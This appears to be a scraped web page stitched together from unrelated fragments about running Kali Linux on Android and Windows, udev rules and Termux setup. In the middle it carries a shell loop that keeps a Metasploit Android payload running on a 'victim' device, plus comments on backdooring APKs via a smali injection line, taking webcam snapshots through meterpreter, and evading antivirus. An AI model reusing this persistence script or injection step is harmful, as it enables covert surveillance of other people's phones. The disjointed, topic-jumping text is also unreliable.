You could add an alias for android, to run it from the terminal. Open the .bashrc file and type in 

alias android="sh path/to/" 

and save it. Restart the terminal or source the bash by typing

source .bashrc. 

When you want to start android, just type in android from the terminal.

I download kali linux on the microsoft store and enable virtualization and then I had kali linux, after I download bluestacks, it had a weird error so I unnistalled and installed again, and it worked, but now I cant use Kali Linux, it says:

Download Linux Kali For Android




while true

do am start --user 0 -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity

sleep 20



(Don't copy these lines "-----" also, there are no line breaks in the 3rd and the 4th line, they are a single line)

(The first line #!/bin/bash is also important as it recognizes the script as a bash shell script)

(You can set the sleep to any amount of seconds you want the script to sleep)


Updated Script v3 (Compatible with any android version)


..I guess, you will have to write it on your own.. (Don't ask me why..)




while :

do am start --user 0 -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity

sleep 20



There is a 'space' between 'while' and ':' 

NO Multiple spaces in the script.

NO Line Break between 3rd and 4th line. (So a total of 5 lines)

> Lets just make the application (i.e. Main Activity) persistent until Reboot

> However, it will not be persistent after the android system on the Victim goes for a Reboot.

> To do this upload the script anywhere in the sdcard:

Hi and Welcome,

Really sorry about the (very) late reply, I actually missed this comment.

This is just an internal error, script is not wrong, tested on the Latest Android Version (5.0.2)

Reboot the android, or try it on another one.

However putting the commands you mentionned like this won't work because it will not run sh inside the shell, what happens is that it uploads the sh file successfully, then open the shell, and run "sh" in background inside the meterpreter terminal and not the android shell, and I don't know how to fix this.

Hi, I just copied your bash script, in my rooted android 5.0.2 phone and when i execute it, it says, while unmatched. I tried addding ; after while and it gives different error. Can someone please help ?

Ii just tried with the am command line only then there is different message.. moreover i think with android 5, i am able to connect to the android device(non rooted), but not able to execute any reboot or shutdown commands. It should say access/permission denied, but it says unknown command. :(

Hello F.E.A.R

first i wanna thanks for all of ur great tut :)

i've got so many question,

1.are the LPORT is important ?? i dont see u typin' it when u make the backdoor.apk

2.Since we know our target android phone is not rooted,are we have to place the shell script in the download folder ??

3.can this method works in iphone ??

5.after i set my listener,and launch the Main Activity app on my other android (not rooted),the meterpreter start working,which makes me happy for a while,i take some pic to try it with (webcamsnap) command,its work as well,and then about 10 minutes later ,my meterpreter wont work with reason : Died.what happen ??

i am uploading the script in Downloads folder of android device, but the same error :( i am trying this script with galaxy s3, when i want to upload with this command "upload" it gives me "core-channel-open: Operation failed: 1"

(I am using this version of script below and when i install only the MainActivity.apk on my android(jelly bean) phone the script works.but when i installed the backdoored apk the script dosen't work and gives me the error shown above. )

Hi, thx for your post. This script doesn't run when injecting payload on an existing apk, since this path is null. In fact you only add this line to the smali activity "invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V". Script tries to launch MainActivity and error says "Activity class does not exist..." Any help? thx in advance

I think that using these tools to generate a basic Payload is useless, AV will detect it immediately and the other thing is that we have very limited access to the phone. If there is a way to get access on phone's camera,files,location,messages etc without roon and on the newer versions of adnroid like android 9,10,11,12 etc then please tell me. Thanks.

In this article, we will look at how to install Kali Linux on android device (non-rooted). That opens a whole new world of possibilities that you can do with your smartphone. Instead of carrying your heavy laptop around, you can go with your phone and still perform penetration testing like you would with your Kali Desktop. Unfortunately, you might be limited to specific resources and capabilities. For example, performing a Reverse Engineering or Malware analysis with your phone won't be that smooth. However, tasks like social engineering can come in quite handy. With that in mind, let's dive in and get started.

You will see a message like "Allow Termux access photos, media and files on your device." Click Allow. When done, execute the command below to install some packages needed to install Kali Linux on android.

I'd suggest you find a linux or android developer site, such as xda-developers, that may already have a forum dedicated to your hardware of interest and see if they have manufacturer support tools and procedures down to create your external boot process or compile a custom roms.

We now need the numbers at the end of the above line: 2970:2282. These specify the vendor (2970) and the device itself (2282). Having those details, we need a root shell on our Linux machine to edit (or create, if it doesn't yet exist) the /etc/udev/rules.d/51-android.rules file. In there, add a line for your device. Following example line shows how it looks for the Wileyfox Swift:

That rule entered in /etc/udev/rules.d/51-android.rules, we must tell udev to make use of it. Safest way (next to a reboot ;) is restarting the udev service. Depending on your Linux distro, this can be done either via service udev restart or /etc/init.d/udev restart.

Two differences: it's now SUBSYSTEM (no plural), and the group has changed from androiddev to plugdev (the former does not exist on recent systems, the latter does and usually is assigned at least to the first user).

Installing Kali on Android device is difficult and easy. Depends on your expertise and how much you can solve the problems you are facing. It's completely different from installing Kali on Desktop version. For, installing Kali there is a untold perquisite that you will need 9GB of free storage. You have to install it on main memory you can't install on external memory(SD card). kali Linux is light weight OS. You don't need high end hardware in the device to smoothly run it. But my suggestion a device with good chipset, 4GB RAM or more and Android Version 10 or above. Let's start the installation process. 

First go to Play Store and install Termux. Open Termux and provide it storage permission:


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